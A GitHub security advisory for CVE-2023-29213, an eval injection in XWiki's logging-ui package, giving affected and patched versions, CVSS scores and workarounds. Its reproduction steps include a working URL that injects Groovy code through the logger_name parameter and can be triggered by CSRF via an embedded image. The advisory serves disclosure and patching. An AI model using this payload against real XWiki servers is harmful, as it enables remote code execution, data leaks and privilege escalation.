Skip to content

org.xwiki.platform:xwiki-platform-logging-ui Eval Injection vulnerability

Critical severity GitHub Reviewed Published Apr 12, 2023 in xwiki/xwiki-platform • Updated Nov 7, 2023

Package

maven org.xwiki.platform:xwiki-platform-logging-ui (Maven)

Affected versions

>= 4.2-milestone-3, < 13.10.11
>= 14.0-rc-1, < 14.4.7
>= 14.5, < 14.10

Patched versions

13.10.11
14.4.7
14.10

Description

Impact

Steps to reproduce:

It is possible to trick a user with programming rights into visiting /xwiki/bin/view/XWiki/LoggingAdmin?loggeraction_set=1&logger_name=%7B%7Bcache%7D%7D%7B%7Bgroovy%7D%7Dnew+File%28%22%2Ftmp%2Fexploit.txt%22%29.withWriter+%7B+out+-%3E+out.println%28%22created+from+notification+filter+preferences%21%22%29%3B+%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fcache%7D%7D&logger_level=TRACE where is the URL of your XWiki installation, e.g., by embedding an image with this URL in a document that is viewed by a user with programming rights.

Expected result:

No file in /tmp/exploit.txt has been created.

Actual result:

The file /tmp/exploit.txt is been created with content "created from notification filter preferences!". This demonstrates a CSRF remote code execution vulnerability that could also be used for privilege escalation or data leaks (if the XWiki installation can reach remote hosts).

Patches

The problem has been patched on XWiki 14.4.7, and 14.10.

Workarounds

The issue can be fixed manually applying this patch.

References

For more information

If you have any questions or comments about this advisory:

References

@tmortagne tmortagne published to xwiki/xwiki-platform Apr 12, 2023
Published to the GitHub Advisory Database Apr 12, 2023
Reviewed Apr 12, 2023
Published by the National Vulnerability Database Apr 17, 2023
Last updated Nov 7, 2023

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

EPSS score

0.143%
(51st percentile)

CVE ID

CVE-2023-29213

GHSA ID

GHSA-4655-wh7v-3vmg

Source code

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.